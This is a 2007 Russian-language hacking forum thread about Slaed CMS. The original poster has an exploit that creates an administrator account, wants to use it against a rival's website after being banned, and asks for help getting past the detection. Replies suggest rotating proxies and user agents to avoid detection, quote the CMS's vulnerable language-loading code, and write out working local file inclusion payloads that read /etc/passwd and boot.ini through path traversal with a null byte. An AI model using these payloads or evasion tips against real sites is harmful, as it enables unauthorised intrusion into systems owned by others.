Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
10.11.2007, 15:20
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Slaed sql
Совершенно случайно ко мне в руки попал приватный эксплоит для удаленного создания администратора в MySQL Slaed CMS
Начал тестировать на своем сайте, нормально.
Все работает.
Никаких предупреждении, что была попытка атаки не поступалала, и в логах не записывалось.
Перешел на портал неприятеля(очень сильно мешает)
Начал тестировать: и тут меня попросили пройти лесом, якобы была попытка атаки и пр. вообщем, автобан дали.
Как это обойти?
Сплоит недавный, выпущен на этой недели.
Сможете помочь проникнуть в систему, поделюсь задаром 
Не туда тему отпостил, только сейчас заметил, модераторы, пожалуйста перенесите
Последний раз редактировалось Ershik; 10.11.2007 в 15:26..
|
|
|
11.11.2007, 11:53
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Если сплоит не юзает списки проксиков и не меняет юзер агенты, то вполне могут и палить количество запросов.. по некоему идентификатору..
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
11.11.2007, 13:12
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Скачал последнюю версию с оффсайта Slaed CMS. Кинулся в глаза код в файле function/sources.php:
PHP код:
function get_lang($module="") {
global $multilingual, $currentlang, $language, $user_cookie_t;
if (isset($_REQUEST['newlang']) && $multilingual == "1") {
if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) {
setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t));
require_once("language/lang-".$_REQUEST['newlang'].".php");
Вызов функции get_lang идет в файле index.php,
PHP код:
require_once("function/function.php");
get_lang();
Поетому, при magic_quotes_gpc = off есть возможность заюзать локальный инклуд
Код:
http://[targethost]/index.php?newlang=../../../../../../../../../../etc/passwd%00
Попробуй, может поможет. |
|
|
|
11.11.2007, 20:05
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
The_HuliGun в данном случае нельзя.
через такую конструкцию
Код:
language/lang-".$_REQUEST['newlang'].".php
в newlang можно передать локальные фвайлы из папки language, которые наячинаются с lang- =)) . фолдеры через нее не передадутся. можешь проверить на локалхосте
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
11.11.2007, 23:30
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
blackybr, я тоже сперва хотел написать, что инклуда на самом деле нет, но когда я проверил на локалхосте, то все отлично работало. Так что проверь сам и убедись =) Попробуй так:
http://localhost/slaed/html/?newlang=/../../index
The_HuliGun +1
|
|
|
|
12.11.2007, 14:10
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
На сайте не прокатило...
Как мне сказали в личке, обнаружение атаки идет по той причине,что ведуться логи администратора...
|
|
|
|
13.11.2007, 08:27
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
в newlang можно передать локальные фвайлы из папки language, которые наячинаются с lang- =)) . фолдеры через нее не передадутся. можешь проверить на локалхосте
Конечно будет работать, не знаю что тебя здесь удивило? Хотя есть одна особенность, как вы поняли, инклуд проходит через несуществующую папку. Например если инклудить
Код:
?newlang=not_exist/../../../boot.ini%00
Тогда получаем путь
Код:
language/lang-not_exist/../../../boot.ini%00
И по сути папка lang-not_exist на системе не существует, а инклуд проходит. В свое время меня тоже мучил вопрос о инклуде через несуществующую папку, и я заметил характерную вещь для *nix систем: если иклудить с %00 в конце тогда все инклудится прекрасно, если без %00 тогда инклудить не хочет.
|
|
|
|
13.11.2007, 15:20
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Я сказал по своим наблюдениям. У меня на винде инклудит через несущ, на эмуле же под слакой нет =)
в 1ом пхп 5.1.2, 2 - 4.4.4
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
24.11.2007, 11:02
|
|
Новичок
Регистрация: 24.11.2007
Сообщений: 1
Провел на форуме:
3516
Репутация:
0
|
|
Множественные уязвимости в SLAED:
http://inattack.ru/forum/index.php?showtopic=15102&pid=77907&st=0
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
